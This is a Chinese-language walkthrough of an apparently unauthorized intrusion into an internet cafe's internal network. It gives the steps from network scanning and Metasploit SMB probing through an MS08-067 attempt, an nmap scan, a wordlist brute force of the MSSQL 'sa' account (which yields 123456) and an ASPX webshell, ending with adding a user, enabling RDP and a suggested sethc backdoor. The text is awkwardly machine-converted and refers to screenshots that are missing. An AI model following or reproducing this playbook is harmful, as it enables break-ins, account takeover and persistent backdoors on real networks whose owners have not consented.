網吧內網滲透

0X01 準備

vmware，Kali linux，啊D網絡工具包

0x02 初探

我上網的這臺電腦IP是192.168.21.128

先使用kali linux虛擬機對整個網絡進行掃描！

然發現192.168.1.1 開放了23 telnet 端口！（爲何只掃到了1.x網段呢？）詳解移步

以前是打算用armitage，可是不知道爲何一直鏈接不上！

用啊D直接對整個網絡進行掃描 192.168.1.0-192.168.255.255

過了漫長的時間，掃出192.168.3.99 開放了445 端口

打開kali 用msf進行一下深刻掃描(smb_version 協議掃描)

首先啓動msf

msfconsole

search smb_version

use auxiliary/scanner/smb/smb_version

show options

set RHOST 192.168.3.99

run

以後咱們會發現系統版本和補丁信息

windows XP sp3

而後再利用ms08_067對目標進行一次攻擊

然而咱們想的太簡單了，攻擊失敗，沒有返回目標的shell

對目標進行一次隱祕的端口掃描

db_nmap -sS -Pn 192.168.3.99

 

發現1433端口開放

使用msf下的mssql_login破解sa的密碼

search mssql_login

use 破解腳本

set PASS_FILE /usr/share/wordlists/rockyou.txt

set RHOST 192.168.3.99

exploit

圖上看到的

[+] 192.168.3.99:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:123456

密碼出來了， 123456
咱們再加載一個 payload
以下圖

msf  並無爲攻擊者返回 meterpreter 會話
那麼咱們就手工來獲取對方權限
首先下載一個 aspx 本地環境
弄一個 aspx 大馬
輸入 mssql 目標和帳戶密碼進行連接
建立 cmdshell
執行系統命令
添加帳戶，開啓 3389 以後，考慮到對方是 xp 便沒有登陸
能夠考慮劫持 sethc 或者其餘後門程序！
以上操做請往下看圖